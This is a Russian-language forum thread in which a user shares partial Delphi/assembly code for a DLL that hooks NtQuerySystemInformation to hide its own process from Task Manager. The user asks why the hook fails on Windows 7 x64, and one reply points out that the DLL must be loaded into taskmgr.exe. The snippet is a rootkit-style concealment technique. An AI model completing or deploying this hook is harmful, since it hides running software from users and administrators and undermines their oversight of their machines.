Скрыть процесс в Windows 7

[NetSpace]

На этом сайте как-то нашёл следующий код DLL для скрытия собственного процесса Приведу не весь, а только часть:

Код:

library hide;
uses Windows,SysUtils,TlHelp32,ImageHlp;
...
...             SystemInformation:Pointer;SystemInformationLength:ULONG;ReturnLength:PULONG):LongInt;stdcall;
label onceagain,getnextpidstruct,quit,fillzero; 
asm 
   push ReturnLength
   push SystemInformationLength
   push SystemInformation
   push dword ptr SystemInformationClass
   call dword ptr [addr_NtQuerySystemInformation]
   or eax,eax
   jl quit
   cmp SystemInformationClass,SystemProcessesAndThreadsInformation
   jne quit
   onceagain:
   mov esi,SystemInformation
   getnextpidstruct:
   mov ebx,esi
   cmp dword ptr [esi],0
   je quit
   add esi,[esi]
   mov ecx,[esi+44h]
   cmp ecx,mypid
   jne getnextpidstruct
   mov edx,[esi]
   test edx,edx
   je fillzero
   add [ebx],edx
   jmp onceagain
   fillzero:
   and [ebx],edx
   jmp onceagain
   quit:
   mov Result,eax
end;
...
...
begin 
   hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');
   if hmap=0 then exit;
   try
      mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);
      if mapaddr=nil then exit;
      mypid:=mapaddr^;
      hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);
      if hideOnlyTaskMan^ then
      begin
         fname:=allocMem(MAX_PATH+1);
         GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);
         //if not(ExtractFileName(fname)='taskmgr.exe')then exit;
      end;
      InterceptFunctions;
      finally
      UnmapViewOfFile(mapaddr);
      CloseHandle(Hmap);
      DLLProc:=@LibraryProc;
   end; 
end.

и под Windows XP его скомпилировал.
а полученный файл DLL уже применял в другом проекте, чтоб скрыть свой процесс.
Позже под Windows 7 попробовал запустить всё по новой.Но вот те же Deplhi 5 и 7 ругаются на следующую строчку в коде:

Код:

cmp SystemInformationClass,SystemProcessesAndThreadsInformation

в итоге DLL всё равно компилируется, но какой-то косячный. И если его использовать в другом проекте для скрытия, то процесс всё равно виден в списке. Не скрывается...
Что не так в этом коде?
И ещё в Инете видел такой вариант той самой строчки:

Код:

cmp SystemInformationClass,5

Пробовал и так и эдак, но безуспешно.
У меня Windows 7 (x64 Максимальная)

[GunSmoker]

Читаем до полного просветления:
http://www.transl-gunsmoker.ru/2009/...post_9405.html
http://www.transl-gunsmoker.ru/2009/...teprocess.html
http://forum.vingrad.ru/forum/topic-...1985719/0.html

[NetSpace]

Этими ссылками вы хотели красноречиво сказать, что "лучше не делать ядерную бомбу, которая может убить не только врагов, но и нас вместе с ними тоже"? И лучше не пытаться её изобретать?

[rpy3uH]

Цитата:

cmp SystemInformationClass,SystemProces sesAndThreadsInformation

SystemProcessesAndThreadsInformatio n и 5 это одно и тоже.

Цитата:

Сообщение от NetSpace

Не скрывается...
Что не так в этом коде?

под XP работает, а на W7 нет. для того чтобы перехват работал твоя DLL должна быть загружена в процесс taskmgr.exe. Убедись что твоя DLL грузится taskmgr.exe